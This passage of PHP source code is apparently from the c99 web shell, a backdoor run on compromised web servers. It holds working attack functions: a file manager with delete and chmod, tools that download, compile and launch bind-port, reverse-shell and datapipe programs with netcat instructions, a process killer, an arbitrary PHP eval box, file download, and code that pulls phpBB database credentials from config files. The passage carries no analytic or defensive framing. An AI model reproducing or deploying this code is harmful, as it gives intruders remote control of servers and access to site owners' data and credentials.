     $row[] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode(realpath($d.$o))."';document.todo.sort.value='".$sort."';document.todo.submit();\">".$o."</a>";
     $row[] = "LINK";
    }
    elseif ($o == "..")
    {
     $row[] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode(realpath($d.$o))."';document.todo.sort.value='".$sort."';document.todo.submit();\">".$o."</a>";
     $row[] = "LINK";
    }
    elseif (is_dir($v))
    {
     if (is_link($v))
     {
      $disppath .= " => ".readlink($v);
      $type = "LINK";
      $row[] =  "&nbsp;<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".$uv."';document.todo.sort.value='".$sort."';document.todo.submit();\">[".$disppath."]</a>";         }
     else
     {
      $type = "DIR";
      $row[] =  "&nbsp;<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".$uv."';document.todo.sort.value='".$sort."';document.todo.submit();\">[".$disppath."]</a>";
     }
     $row[] = $type;
    }
    elseif(is_file($v))
    {
     $ext = explode(".",$o);
     $c = count($ext)-1;
     $ext = $ext[$c];
     $ext = strtolower($ext);
     $row[] =  "&nbsp;<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.d.value='".$ud."';document.todo.f.value='".$uo."';document.todo.submit();\">".$disppath."</a>";
     $row[] = view_size($a[1]);
    }
    $row[] = date("d.m.Y H:i:s",$a[2]);
    if (!$win) {$row[] = $a[3];}
     $row[] =  "&nbsp;<a href=\"#\" onclick=\"document.todo.act.value='chmod';document.todo.d.value='".$ud."';document.todo.f.value='".$uo."';document.todo.submit();\"><b>".view_perms_color($v)."</b></a>";
    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
    if (is_dir($v)){$row[] = "<a href=\"#\" onclick=\"document.todo.act.value='d';document.todo.d.value='".$uv."';document.todo.submit();\">I</a>&nbsp;".$checkbox;}
    else {$row[] = "<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".$uo."';document.todo.ft.value='info';document.todo.d.value='".$ud."';document.todo.submit();\">I</a>&nbsp;<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".$uo."';document.todo.ft.value='edit';document.todo.d.value='".$ud."';document.todo.submit();\">E</a>&nbsp;<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".$uo."';document.todo.ft.value='download';document.todo.d.value='".$ud."';document.todo.submit();\">D</a>&nbsp;".$checkbox;}
    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
    elseif (is_link($v)) {$tab["links"][] = $row;}
    elseif (is_dir($v)) {$tab["folders"][] = $row;}
    elseif (is_file($v)) {$tab["files"][] = $row;}
    $i++;
   }
  }
  //Compiling table
  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
  echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
  foreach($table as $row)
  {
   echo "<tr>\r\n";
   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
   echo "</tr>\r\n";
  }
  echo "</table><hr size=\"1\" noshade><p align=\"right\">
 
  <script>
  function ls_setcheckboxall(status)
  {
   var id = 0;
   var num = ".(count($table)-2).";
   while (id <= num)
   {
    document.getElementById('actbox'+id).checked = status;
    id++;
   }
  }
  function ls_reverse_all()
  {
   var id = 0;
   var num = ".(count($table)-2).";
   while (id <= num)
   {
    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
    id++;
   }
  }
  </script>
  <input type=\"button\" onclick=\"ls_setcheckboxall(1);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(0);\" value=\"Unselect all\"><b>";
  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
  {
   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
  }
  echo "<select name=act><option value=\"".$act."\">With selected:</option>";
  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
  if ($usefsbuff)
  {
   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
  }
  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
  echo "</form>";
 }
}
if ($act == "tools")
{
 $bndportsrcs = array(
  "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"),
  "c99sh_bindport.c"=>array("Using C","%path %port %pass")
 );
 $bcsrcs = array(
  "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
  "c99sh_backconn.c"=>array("Using C","%path %host %port")
 );
 $dpsrcs = array(
  "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"),
  "c99sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost")
 );
 if (!is_array($bind)) {$bind = array();}
 if (!is_array($bc)) {$bc = array();}
 if (!is_array($datapipe)) {$datapipe = array();}
 
 if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}
 if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}
 
 if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");}
 if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;}
 
 if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";}
 if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;}
 if (!empty($bindsubmit))
 {
  echo "<b>Result of binding port:</b><br>";
  $v = $bndportsrcs[$bind["src"]];
  if (empty($v)) {echo "Unknown file!<br>";}
  elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
  else
  {
   $w = explode(".",$bind["src"]);
   $ext = $w[count($w)-1];
   unset($w[count($w)-1]);
   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
   $binpath = $tmpdir.join(".",$w).rand(0,999);
   if ($ext == "pl") {$binpath = $srcpath;}
   @unlink($srcpath);
   $fp = fopen($srcpath,"ab+");
   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
   elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources!";}
   else
   {
    fwrite($fp,$data,strlen($data));
    fclose($fp);
    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath);  @unlink($srcpath);}
    $v[1] = str_replace("%path",$binpath,$v[1]);
    $v[1] = str_replace("%port",$bind["port"],$v[1]);
    $v[1] = str_replace("%pass",$bind["pass"],$v[1]);
    $v[1] = str_replace("//","/",$v[1]);
    $retbind = myshellexec($v[1]." > /dev/null &");
    sleep(5);
    $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);
    if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";}
    else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"#\" onclick=\"document.todo.act.value='processes';document.todo.grep.value='".basename($binpath)."';document.todo.submit();\"><u>View binder's process</u></a></center>";}
   }
   echo "<br>";
  }
 }
 if (!empty($bcsubmit))
 {
  echo "<b>Result of back connection:</b><br>";
  $v = $bcsrcs[$bc["src"]];
  if (empty($v)) {echo "Unknown file!<br>";}
  else
  {
   $w = explode(".",$bc["src"]);
   $ext = $w[count($w)-1];
   unset($w[count($w)-1]);
   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
   $binpath = $tmpdir.join(".",$w).rand(0,999);
   if ($ext == "pl") {$binpath = $srcpath;}
   @unlink($srcpath);
   $fp = fopen($srcpath,"ab+");
   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
   elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!";}
   else
   {
    fwrite($fp,$data,strlen($data));
    fclose($fp);
    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
    $v[1] = str_replace("%path",$binpath,$v[1]);
    $v[1] = str_replace("%host",$bc["host"],$v[1]);
    $v[1] = str_replace("%port",$bc["port"],$v[1]);
    $v[1] = str_replace("//","/",$v[1]);
    $retbind = myshellexec($v[1]." > /dev/null &");
    echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>";
   }
  }
 }
 if (!empty($dpsubmit))
 {
  echo "<b>Result of datapipe-running:</b><br>";
  $v = $dpsrcs[$datapipe["src"]];
  if (empty($v)) {echo "Unknown file!<br>";}
  elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
  else
  {
   $srcpath = $tmpdir.$datapipe["src"];
   $w = explode(".",$datapipe["src"]);
   $ext = $w[count($w)-1];
   unset($w[count($w)-1]);
   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
   $binpath = $tmpdir.join(".",$w).rand(0,999);
   if ($ext == "pl") {$binpath = $srcpath;}
   @unlink($srcpath);
   $fp = fopen($srcpath,"ab+");
   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
   elseif (!$data = c99getsource($datapipe["src"])) {echo "Can't download sources!";}
   else
   {
    fwrite($fp,$data,strlen($data));
    fclose($fp);
    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
    list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]);
    $v[1] = str_replace("%path",$binpath,$v[1]);
    $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]);
    $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]);
    $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]);
    $v[1] = str_replace("//","/",$v[1]);
    $retbind = myshellexec($v[1]." > /dev/null &");
    sleep(5);
    $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5);
    if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";}
    else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"#\" onclick=\"document.todo.act.value='processes';document.todo.grep.value='".basename($binpath)."';document.todo.submit();\"><u>View datapipe process</u></a></center>";}
   }
   echo "<br>";
  }
 }
 ?><b>Binding port:</b><br><form method="POST"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php
 foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
 ?></select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form>
 
<b>Back connection:</b><br><form method="POST"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php
foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
?></select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form>
Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
<b>Datapipe:</b><br><form method="POST"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>">&nbsp;<select name="datapipe[src]"><?php
foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
?></select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.<?php
}
if ($act == "processes")
{
 echo "<b>Processes:</b><br>";
 if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
 else {$handler = "tasklist";}
 $ret = myshellexec($handler);
 if (!$ret) {echo "Can't execute \"".$handler."\"!";}
 else
 {
  if (empty($processes_sort)) {$processes_sort = $sort_default;}
  $parsesort = parsesort($processes_sort);
  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
  $k = $parsesort[0];
  if ($parsesort[1] != "a") {$y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$k."a\"';document.todo.submit();\">!</a>";}
  else {$y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$k."d\"';document.todo.submit();\">!</a>";}
  $ret = htmlspecialchars($ret);
  if (!$win)
  {
   if ($pid)
   {
    if (is_null($sig)) {$sig = 9;}
    echo "Sending signal ".$sig." to #".$pid."... ";
    if (posix_kill($pid,$sig)) {echo "OK.";}
    else {echo "ERROR.";}
   }
   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
   $stack = explode("\n",$ret);
   $head = explode(" ",$stack[0]);
   unset($stack[0]);
   for($i=0;$i<count($head);$i++)
   {
    if ($i != $k) {$head[$i] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$i.$parsesort[1]."';document.todo.submit();\"><b>".$head[$i]."</b></a>";}
   }
   $prcs = array();
   foreach ($stack as $line)
   {
    if (!empty($line))
        {
         echo "<tr>";
     $line = explode(" ",$line);
     $line[10] = join(" ",array_slice($line,10));
     $line = array_slice($line,0,11);
     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
     $line[] = "<a href=\"#\" onclick=\"document.todo.act.value='processes';document.todo.d.value='".urlencode($d)."';document.todo.pid.value='".$line[1]."';document.todo.sig.value='9';document.todo.submit();\"><u>KILL</u></a>";
     $prcs[] = $line;
     echo "</tr>";
    }
   }
  }
  else
  {
   while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
   while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
   while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
   while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
   while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
   while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
   while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
   while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
   while (ereg("  ",$ret)) {$ret = str_replace("  ","        ",$ret);}
   while (ereg("                ",$ret)) {$ret = str_replace("                ","        ",$ret);}
   while (ereg("         ",$ret)) {$ret = str_replace("         ","        ",$ret);}
   $ret = convert_cyr_string($ret,"d","w");
   $stack = explode("\n",$ret);
   unset($stack[0],$stack[2]);
   $stack = array_values($stack);
   $head = explode("        ",$stack[0]);
   $head[1] = explode(" ",$head[1]);
   $head[1] = $head[1][0];
   $stack = array_slice($stack,1);
   unset($head[2]);
   $head = array_values($head);
 
   if ($parsesort[1] != "a") {$y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$k."a\"';document.todo.submit();\">!</a>";}
   else {$y = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$k."d\"';document.todo.submit();\">!</a>";}
   if ($k > count($head)) {$k = count($head)-1;}
   for($i=0;$i<count($head);$i++)
   {
    if ($i != $k) {$head[$i] = "<a href=\"#\" onclick=\"document.todo.act.value='".$dspact."';document.todo.d.value='".urlencode($d)."';document.todo.processes_sort.value='".$i.$parsesort[1]."a\"';document.todo.submit();\"><b>".trim($head[$i])."</b></a>";}
   }
   $prcs = array();
   foreach ($stack as $line)
   {
    if (!empty($line))
    {
     echo "<tr>";
     $line = explode("        ",$line);
     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
     $line[2] = intval(str_replace(" ","",$line[2]))*1024;
     $prcs[] = $line;
     echo "</tr>";
    }
   }
  }
  $head[$k] = "<b>".$head[$k]."</b>".$y;
  $v = $processes_sort[0];
  usort($prcs,"tabsort");
  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
  $tab = array();
  $tab[] = $head;
  $tab = array_merge($tab,$prcs);
  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
  foreach($tab as $i=>$k)
  {
   echo "<tr>";
   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
   echo "</tr>";
  }
  echo "</table>";
 }
}
if ($act == "eval")
{
 if (!empty($eval))
 {
  echo "<b>Result of execution this PHP-code</b>:<br>";
  $tmp = ob_get_contents();
  $olddir = realpath(".");
  @chdir($d);
  if ($tmp)
  {
   ob_clean();
   eval($eval);
   $ret = ob_get_contents();
   $ret = convert_cyr_string($ret,"d","w");
   ob_clean();
   echo $tmp;
   if ($eval_txt)
   {
    $rows = count(explode("\r\n",$ret))+1;
    if ($rows < 10) {$rows = 10;}
    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
   }
   else {echo $ret."<br>";}
  }
  else
  {
   if ($eval_txt)
   {
    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
    eval($eval);
    echo "</textarea>";
   }
   else {echo $ret;}
  }
  @chdir($olddir);
 }
 else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
 echo "<form method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
}
if ($act == "f")
{
 if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
 {
  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='edit';document.todo.c.value='1';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><u>Create</u></a></center>";}
 }
 else
 {
  $r = @file_get_contents($d.$f);
  $ext = explode(".",$f);
  $c = count($ext)-1;
  $ext = $ext[$c];
  $ext = strtolower($ext);
  $rft = "";
  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
  if (empty($ft)) {$ft = $rft;}
  $arr = array(
   array("DIZ","info"),
   array("HTML","html"),
   array("TXT","txt"),
   array("Code","code"),
   array("Session","phpsess"),
   array("EXE","exe"),
   array("SDB","sdb"),
   array("INI","ini"),
   array("DOWNLOAD","download"),
   array("RTF","notepad"),
   array("EDIT","edit")
  );
  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
  foreach($arr as $t)
  {
   if ($t[1] == $rft) {echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='".$t[1]."';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><font color=green>".$t[0]."</font></a>";}
   elseif ($t[1] == $ft) {echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='".$t[1]."';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><b><u>".$t[0]."</u></b></a>";}
   else {echo " <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='".$t[1]."';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><b>".$t[0]."</b></a>";}
   echo " |";
  }
  echo "<hr size=\"1\" noshade>";
  if ($ft == "info")
  {
   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
   if (!$win)
   {
    echo "<tr><td><b>Owner/Group</b></td><td> ";
    $ow = posix_getpwuid(fileowner($d.$f));
    $gr = posix_getgrgid(filegroup($d.$f));
    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
   }
   echo "<tr><td><b>Perms</b></td><td><a href=\"#\" onclick=\"document.todo.act.value='chmod';document.todo.f.value='".urlencode($f)."';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
   $fi = fopen($d.$f,"rb");
   if ($fi)
   {
    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
    $n = 0;
    $a0 = "00000000<br>";
    $a1 = "";
    $a2 = "";
    for ($i=0; $i<strlen($str); $i++)
    {
     $a1 .= sprintf("%02X",ord($str[$i]))." ";
     switch (ord($str[$i]))
     {
      case 0:  $a2 .= "<font>0</font>"; break;
      case 32:
      case 10:
      case 13: $a2 .= "&nbsp;"; break;
      default: $a2 .= htmlspecialchars($str[$i]);
     }
     $n++;
     if ($n == $hexdump_rows)
     {
      $n = 0;
      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
      $a1 .= "<br>";
      $a2 .= "<br>";
     }
    }
    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
   }
   $encoded = "";
   if ($base64 == 1)
   {
    echo "<b>Base64 Encode</b><br>";
    $encoded = base64_encode(file_get_contents($d.$f));
   }
   elseif($base64 == 2)
   {
    echo "<b>Base64 Encode + Chunk</b><br>";
    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
   }
   elseif($base64 == 3)
   {
    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
    $encoded = base64_encode(file_get_contents($d.$f));
    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
   }
   elseif($base64 == 4)
   {
    $text = file_get_contents($d.$f);
    $encoded = base64_decode($text);
    echo "<b>Base64 Decode";
    if (base64_encode($encoded) != $text) {echo " (failed)";}
    echo "</b><br>";
   }
   if (!empty($encoded))
   {
    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
   }
   echo "<b>HEXDUMP:</b><nobr> [<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.fullhexdump.value='1';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">Full</a>] [<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">Preview</a>]<br><b>Base64: </b>
 
<nobr>[<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.base64.value='1';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">Encode</a>]&nbsp;</nobr>
<nobr>[<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.base64.value='2';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">+chunk</a>]&nbsp;</nobr>
<nobr>[<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.base64.value='3';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">+chunk+quotes</a>]&nbsp;</nobr>
<nobr>[<a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='".urlencode($f)."';document.todo.ft.value='info';document.todo.base64.value='4';document.todo.d.value='".urlencode($d)."';document.todo.submit();\">Decode</a>]&nbsp;</nobr>
<P>";
  }
  elseif ($ft == "html")
  {
   if ($white) {@ob_clean();}
   echo $r;
   if ($white) {c99shexit();}
  }
  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
  elseif ($ft == "phpsess")
  {
   echo "<pre>";
   $v = explode("|",$r);
   echo $v[0]."<br>";
   var_dump(unserialize($v[1]));
   echo "</pre>";
  }
  elseif ($ft == "exe")
  {
   $ext = explode(".",$f);
   $c = count($ext)-1;
   $ext = $ext[$c];
   $ext = strtolower($ext);
   $rft = "";
   foreach($exeftypes as $k=>$v)
   {
    if (in_array($ext,$v)) {$rft = $k; break;}
   }
   $cmd = str_replace("%f%",$f,$rft);
   echo "<b>Execute file:</b><form method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
  }
  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
  elseif ($ft == "code")
  {
   if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
   {
    $arr = explode("\n",$r);
    if (count($arr == 18))
    {
     include($d.$f);
     echo "<b>phpBB configuration is detected in this file!<br>";
     if ($dbms == "mysql4") {$dbms = "mysql";}
     if ($dbms == "mysql") {echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($dbuser)."';document.sql.sql_passwd.value='".htmlspecialchars($dbpasswd)."';document.sql.sql_server.value='".htmlspecialchars($dbhost)."';document.sql.sql_port.value='3306';document.sql.sql_db.value='".htmlspecialchars($dbname)."';document.sql.submit();\"><b><u>Connect to DB</u></b></a><br><br>";}
     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99madshell. Please, report us for fix.";}
     echo "Parameters for manual connect:<br>";
     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
     echo "</b><hr size=\"1\" noshade>";
    }
   }
   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
   if (!empty($white)) {@ob_clean();}
   highlight_file($d.$f);
   if (!empty($white)) {c99shexit();}
   echo "</div>";
  }
  elseif ($ft == "download")
  {
   @ob_clean();
   header("Content-type: application/octet-stream");
   header("Content-length: ".filesize($d.$f));
   header("Content-disposition: attachment; filename=\"".$f."\";");
   echo $r;
   exit;
